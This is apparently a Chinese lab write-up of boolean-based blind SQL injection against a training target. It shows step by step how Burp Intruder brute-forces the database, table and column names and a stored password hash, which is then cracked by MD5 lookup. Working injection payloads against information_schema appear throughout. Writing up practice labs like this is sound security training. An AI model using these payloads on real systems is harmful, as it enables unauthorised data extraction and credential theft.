bool盲注复现

###思路:

####1.得到数据库的名称

爆破数据库名称长度:

1
1/if(length(database())!=1,1,0)

响应:

1
Content-Length: 1059

如果代码有误,则不会是1059长度

设置变量:

1
1/if(length(database())=§1§,1,0)

image-20230524194245568

可知长度为10

  1. 爆破数据库名称:
1
1/if(mid(database(),2,1)!='r',1,0)

响应:

1
Content-Length: 1059

放入intruder设置变量:

1
1/if(mid(database(),§2§,1)='§r§',1,0)

image-20230524195356418

可知 库为:stormgroup

####2.已知库求表的长度和表的名称:

1
1/if(length((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'))!=56,1,0)

响应:

1
Content-Length: 1059

同理:
image-20230524200922497

tablename长度为13,接下来爆破名称:

image-20230524201452170

可知名称为member,notice

####3.由名称可得爆破member 列

1
1/if(length((select group_concat(column_name) from information_schema.columns where table_name='member'))!=56,1,0)

响应:

1
Content-Length: 1059

同理:

image-20230524202037279

可知长度为column为20

由长度爆破列名:

1
1/if(mid((select group_concat(column_name) from information_schema.columns where table_name='member'),2,1)!='r',1,0)

image-20230524202550219

列名:name,password,status

求name长度

image-20230524203534753

求name名称

image-20230524204038449

mozhe,mozhe

求password的长度

image-20230524204303525

password长度65

求password

image-20230524205518489

MD5解密:

927622

image-20230524205558713